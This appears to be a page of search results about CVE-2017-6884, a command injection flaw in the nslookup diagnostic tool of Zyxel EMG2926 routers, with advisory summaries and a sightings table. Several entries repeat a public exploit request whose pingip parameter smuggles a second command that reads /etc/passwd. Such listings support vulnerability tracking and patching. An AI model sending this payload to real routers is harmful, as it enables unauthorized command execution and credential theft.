9 matches found
Zyxel Router Command Injection Vulnerability (CVE-2017-6884)
According to its model number and firmware revision, the remote Zyxel Router is affected by a command injection vulnerability within nslookup funciton of the diagnostic tools. An authenticated, remote attacker can exploit this, via various crafted HTTP commands, to execute arbitrary commands...
Zyxel EMG2926 Router OS Command Injection (CVE-2017-6884)
A command injection vulnerability exists in Zyxel EMG2926. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the router...
CVE-2017-6884
creationtimestamp| type| source ---|---|--- 2018-07-30 08:48:18+00:00| seen| MISP/5b5ece74-a5c8-40cd-87d6-d789950d210f 2020-01-08 13:22:45+00:00| seen| MISP/5e15d698-a3b4-40fd-86e7-15cc02de0b81 2020-10-09 14:13:46+00:00| seen| MISP/b6fb39e0-8665-41f9-bc21-88d7f1945ec4 2020-10-09 16:07:57+00:00|...
CVE-2017-6884
A command injection vulnerability was discovered on the Zyxel EMG2926 home router with firmware V1.00AAQT.4b8. The vulnerability is located in the diagnostic tools, specifically the nslookup function. A malicious user may exploit numerous vectors to execute arbitrary commands on the router, such ...
CVE-2017-6884
The CVE-2017-6884 issue affects Zyxel EMG2926 routers (firmware around V1.00(AAQT.4)b8). The vulnerability is a command injection in the nslookup diagnostic tool that an authenticated, remote attacker can exploit via crafted HTTP requests (e.g., manipulating the ping_ip parameter in expert/mainte...
Zyxel EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection Vulnerability
Exploit for hardware platform in category remote exploits Exploit Title: Zyxel, EMG2926 /expert/maintenance/diagnostic/nslookup?nslookupbutton=nslookupbutton&pingip=google.ca%3b%20cat%20/etc/passwd&serverip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh...
Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection
Exploit Title: Zyxel, EMG2926 /expert/maintenance/diagnostic/nslookup?nslookupbutton=nslookupbutton&pingip=google.ca%3b%20cat%20/etc/passwd&serverip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10124 AppleWebKit/537.36 KHTML, like Geck...
Zyxel_ EMG2926 V1.00(AAQT.4)b8 - OS Command Injection
Zyxel EMG2926 V1.00AAQT.4b8 - OS Command Injection Exploit Title: Zyxel, EMG2926 /expert/maintenance/diagnostic/nslookup?nslookupbutton=nslookupbutton&pingip=google.ca%3b%20cat%20/etc/passwd&serverip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh; Intel...
Zyxel / EMG2926 Command Injection
Exploit Title: Zyxel, EMG2926 /expert/maintenance/diagnostic/nslookup?nslookupbutton=nslookupbutton&pingip=google.ca%3b%20cat%20/etc/passwd&serverip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10124 AppleWebKit/537.36 KHTML, like Geck...